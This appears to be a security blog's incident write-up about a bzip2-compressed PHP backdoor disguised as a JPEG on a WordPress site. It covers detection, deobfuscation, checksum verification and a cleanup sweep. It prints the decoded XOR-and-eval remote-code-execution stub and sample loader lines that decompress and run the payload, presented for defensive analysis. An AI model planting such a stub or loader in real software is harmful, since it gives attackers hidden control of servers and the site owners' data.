Back to Articles

The JPEG That Wasn't: A Compressed PHP Backdoor Disguised as an Image

Share:
Source code on a laptop screen in a dark room

The file was called googlefonts.jpg. It was 1.3 KB, it sat among a WordPress site's files, and its name suggested a cached font preview, the kind of file no one ever opens. It was not an image. It was not a font. It was a bzip2 archive with a backdoor inside it, and the site's own security scanner had walked straight past it.

This write-up covers three things. First, how a compressed container hides a payload from content scanners. Second, how to unpack and read that payload safely. Third, the part people usually skip: once you have found one backdoor, how do you prove there isn't another one? Everything here is sanitized. Identifying details, parameter names and keys are removed or replaced.

The setup: a quarantine folder with three files

By the time I looked at the site, the owner's security tooling had already moved three files into a quarantine folder:

googlefonts.jpg                    1,301 bytes
output                             2,513 bytes
class-wp-widget-block.php.infected   ~5 KB

A quarantine folder is a good start. It is not a finished investigation. A tool that flags files can be wrong in both directions: it can miss something and it can flag something innocent. In this case it did both. One of these three files was the real threat and had not been detected. Another was a perfectly clean WordPress core file. We'll take them in order.

Step 1: ignore the extension, read the magic bytes

A file extension is just part of the name. The operating system, the web server and PHP don't care what a file is called when they decide what's inside it. Every serious file format starts with a recognisable signature, its magic bytes, and that's the first thing to check:

$ xxd googlefonts.jpg | head -2
00000000: 425a 6834 3141 5926 5359 a52c 4089 0002  BZh41AY&SY.,@...
00000010: 02df 8000 1077 ff7f ffff ffff ffbf ffff  .....w..........

$ file googlefonts.jpg
googlefonts.jpg: bzip2 compressed data, block size = 400k

A real JPEG starts with FF D8 FF. This file starts with BZh, the bzip2 signature, followed by 4 (a 400k block size) and 1AY&SY, the block header bzip2 uses (the digits of pi in BCD). There is no image data anywhere in it. The .jpg name had one job: make the file look boring to a human scrolling through a directory listing.

This is different from a true polyglot. In an earlier article I covered webshells that hide inside real JPEG headers: those files are valid images and executable PHP at the same time. This one is neither. It is a compressed blob that can't run on its own and must be unpacked first.

Step 2: why the scanner missed it

Most web malware scanners work on file content. They look for strings and structures such as eval(, base64_decode, long hex runs and known obfuscator fingerprints. Compression destroys every one of those features. bzip2 runs the data through a Burrows–Wheeler transform and Huffman coding, so the output is high-entropy noise that shares no readable substring with the PHP inside it. A signature that matches the backdoor's source code has nothing to match in the compressed bytes.

The proof is in the quarantine folder itself. The file named output was the decompressed copy, which someone produced while poking at the archive. The scanner flagged output straight away. The compressed original, carrying exactly the same code, sat undetected. Same payload, different wrapper, opposite verdict.

Step 3: unpack it safely

Decompressing a payload is safe as long as you only read the result. Never pass it to PHP, never put it under a web root, and work on a copy in a scratch directory you control:

$ bzcat googlefonts.jpg > /tmp/analysis/payload.txt
$ cmp /tmp/analysis/payload.txt output && echo IDENTICAL
IDENTICAL

The cmp check matters. It confirms that the detected output file and the undetected archive are the same malware. That turns a hunch into evidence and tells you the archive is the original, not a stray artifact.

Step 4: read the payload

The decompressed file is about 2.5 KB of PHP that has been put through a goto obfuscator. Every statement is chopped into a labelled fragment, the fragments are shuffled, and execution jumps between them with goto. String literals are written as mixed octal and hex escapes, so even the function names don't appear in plain text. Here is the opening, shortened:

<?php
 goto Wir8F; a35C1: eval($nw4z5); goto CmRBZ; hVDgt: if (!function_exists("\x..\1..\x..")) {
 function f1($i1V9n) { goto isnxT; cF0sc: $X1GjL .= @pack("\x43", $A0DoM | $d6ibB); goto bxTcV; ...
 Wir8F: $wFJAn = "\x..\1..\x.."; goto lMDpO;
 lMDpO: $V6tNB = "\x..\1..\x.."; goto hVDgt;
 ...

Goto obfuscation looks frightening and is mechanical to undo. Start at the first label, follow each goto, write down the statements in the order they actually run, and decode every escaped string (php -r 'echo "\x77\144...";' on an isolated machine, or any hex/octal decoder). Once the labels are untangled, the whole backdoor fits in a dozen lines:

<?php
$param = '[REDACTED_PARAM]';   // name of the POST field the attacker sends
$key   = '[REDACTED_KEY]';     // hardcoded XOR key

function hex_decode($s) { /* hand-rolled, constant-time hex-to-binary */ }

function xor_decrypt($data, $key) {
    for ($i = 0; $i < strlen($data); $i++) {
        $data[$i] = $data[$i] ^ $key[$i % strlen($key)];
    }
    return $data;
}

if (isset($_POST[$param])) {
    $code = hex_decode($_POST[$param]);
    $code = xor_decrypt($code, $key);
    eval($code);
}

So this is a classic encrypted remote code execution stub. The attacker sends a POST request with hex-encoded, XOR-encrypted PHP in one specific field. The stub decodes it, decrypts it with the embedded key, and runs it with eval(). There is no output, no visible trace on the page, and no readable code in the request body. A firewall or log reviewer sees only a field full of hex. Two details are worth noting:

  • The hex decoder is hand-written. Rather than calling hex2bin(), which scanners and WAF rules watch for, it rebuilds the conversion with bit arithmetic on unpack('C*') output. It costs a few more bytes and removes another suspicious function name.
  • It is silent when it isn't called. Without the right POST field, the file does nothing at all. That is exactly why it can sit on a server for months without anyone noticing.

Step 5: an archive needs a loader — go find it

Here is the key point about a compressed backdoor: on its own it is inert. PHP won't execute a bzip2 stream, and a web server will happily serve googlefonts.jpg as a broken image. To do anything, something else has to decompress it and pass the result to the interpreter. Typical loaders look like this:

// decompress in memory and eval
eval('?>' . bzdecompress(file_get_contents(__DIR__ . '/googlefonts.jpg')));

// or let a stream wrapper do the work
include 'compress.bzip2://' . __DIR__ . '/googlefonts.jpg';

The second form is especially nasty. include through the compress.bzip2:// wrapper decompresses on the fly, so the loader line contains no eval, no base64 and no decoding function. So once you find the archive, hunt for its loader across every layer where code can live:

# files: wrappers, decompression calls, and the file name itself
grep -rnaE "compress\.bzip2://|bzdecompress|bzopen|googlefonts" WEBROOT

# auto-prepend tricks that load code before WordPress does
find WEBROOT -name '.user.ini' -o -name '.htaccess' | xargs grep -n "auto_prepend_file"

# the database: options, widgets, code-snippet plugins
SELECT option_name FROM wp_options
 WHERE option_value LIKE '%bzdecompress%' OR option_value LIKE '%compress.bzip2%';

# the access logs: has anyone ever requested it, or sent the trigger field?
grep -a "googlefonts" access.log*

In this case every one of those searches came back empty. No loader in the files, none in the database, no request for the file in the logs. The file's modification time also matched a large batch of files copied during an earlier site migration, so it most likely arrived as a payload staged for a loader that was later removed, or never deployed. That finding matters. It means the backdoor was dormant, not merely undetected. But you only get to say "dormant" after you have looked for the trigger. Until then, assume it's live.

The other half: the file that wasn't malware

The third quarantined file was class-wp-widget-block.php, a standard WordPress core file that renders block-based widgets. Before calling it malicious or clean, there is one authoritative test: compare it to the official checksum for the exact WordPress version installed.

$ curl -s "https://api.wordpress.org/core/checksums/1.0/?version=X.Y.Z&locale=en_US" \
    | grep -o '"wp-includes/widgets/class-wp-widget-block.php":"[a-f0-9]*"'
$ md5sum class-wp-widget-block.php.infected

The hashes matched exactly. The file was byte-for-byte identical to the official release, which makes it a false positive. That has consequences. Quarantining core files can break widget rendering, cause fatal errors, and teach a site owner to ignore alerts. "The scanner flagged it" is a reason to look, not a verdict. Checksums are the verdict.

Proving the rest of the site is clean

Finding one backdoor raises the obvious question: what else is there? "I ran a scan and it came back clean" isn't an answer. We just saw the scanner miss the very file that started this. What you want is a sweep where each step rules out a category of hiding place with evidence rather than heuristics:

  1. WordPress core against official checksums. wp core verify-checksums compares every core file to the release manifest and reports modified and extra files. Result: zero of either.
  2. Every wordpress.org plugin against its own manifest. Plugins from the official directory publish per-version checksums. You can verify each one with wp plugin verify-checksums --all, or fetch them directly:
    curl -s https://downloads.wordpress.org/plugin-checksums/SLUG/VERSION.json
    Any file that doesn't match, or isn't in the manifest, deserves a close look. Result: every directory plugin matched.
  3. Commercial plugins and themes, by timestamp outliers. Paid plugins have no public manifest, but each one is installed or updated as a unit, so its files share an update timestamp. A single file with a different mtime inside an otherwise uniform plugin directory is the anomaly to read first.
  4. Every media file, by magic bytes. This is the check that would have caught our archive without any signature:
    find WEBROOT -type f \( -iname '*.jpg' -o -iname '*.jpeg' -o -iname '*.png' \
         -o -iname '*.gif' -o -iname '*.webp' -o -iname '*.ico' \) \
      -exec sh -c 'printf "%s %s\n" "$(file -b --mime-type "$1")" "$1"' _ {} \; \
      | grep -vE '^image/'
    Anything with an image extension that isn't an image is suspicious by definition. Follow it with a content check for code in non-PHP files: grep -rlaE "<\?php|eval\(" uploads/ --exclude='*.php'.
  5. The database. Search options, posts and widgets for <script, <iframe, eval and encoded blobs, then review the scheduled cron events and the list of active plugins against what is actually on disk. Most hits will be harmless (embedded maps, social widgets), so read each one instead of counting them.
  6. Drop-ins and early loaders. mu-plugins/, advanced-cache.php, object-cache.php, .user.ini and auto_prepend_file all run before WordPress or outside its plugin list. Each needs to be identified and matched to a legitimate owner.
  7. Logs, with response sizes. The access logs showed the usual scanner noise: probes for alfa.php, phpinfo.php, file managers and webshell names, some returning HTTP 200. That looks alarming, but every one returned the same ~12 KB body, the site's homepage. It was a soft 404, where WordPress answers unknown URLs with a normal page. Always compare response sizes before you treat a 200 as a hit.

Only when every layer comes back clean can you write the sentence that matters: no active malware remains. In this case it held. Apart from the archive and its decompressed twin, nothing on the site was malicious.

Takeaways for defenders

  • Trust magic bytes, not extensions. A file -b --mime-type pass over every "image" on a site is cheap and catches whole classes of disguised payloads that signatures miss.
  • Compression is a scanner blind spot. A backdoor that is detected in plain form may be invisible inside bzip2, gzip or zlib. Treat unexplained compressed blobs in a web root as suspicious until you have unpacked and read them.
  • An archive implies a loader. Hunt for bzdecompress, gzinflate, the compress.*:// wrappers and auto_prepend_file across files, the database and logs. Finding nothing is a real finding, and it is what lets you call a payload dormant.
  • Verify before you quarantine. Core and directory-plugin files have official checksums. Check them before you move a file that WordPress needs.
  • "Clean" needs evidence. Checksums for what can be checksummed, timestamp outliers for what can't, magic bytes for media, and response sizes for logs. A clean verdict is only as good as the sweep behind it.

The memorable thing about this case wasn't the sophistication of the backdoor. An XOR-and-eval stub is about as old as PHP malware gets. It was how little effort it took to hide it: one compression pass and a boring file name. The defence is just as unglamorous. Look at what a file actually is, not what it's called.